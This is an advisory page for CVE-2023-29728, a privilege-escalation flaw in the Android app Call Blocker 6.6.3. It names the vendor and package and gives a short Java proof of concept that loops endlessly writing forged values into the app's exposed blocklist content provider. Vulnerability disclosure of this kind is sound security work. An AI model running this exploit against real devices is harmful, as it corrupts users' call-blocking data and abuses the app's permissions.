Headline

CVE-2023-29728: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

1 year ago

CVE

Open in Source

#vulnerability #android #google

Escalation of Privileges exists in Call Blocker（CVE-2023-29728）

Vendor：Fiorenza Francesco(https://www.call-blocker.info/)

Affected product：Call Blocker(com.cuiet.blockCalls)

Version：6.6.3

Download link： https://play.google.com/store/apps/details?id=com.cuiet.blockCalls

Description of the vulnerability for use in the CVE：The Call Blocker application 6.6.3 for Android allows attackers to tamper with feature-related data, resulting in a severe elevation of privilege attack.

poc：

public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); while (true) { Uri uri = Uri.parse(“content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList”); ContentValues contentValues = new ContentValues(); contentValues.put(“photo_uri","123456789”); contentValues.put(“numeroContatto","987654321”); contentResolver.update(uri,contentValues,null,null); } }

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago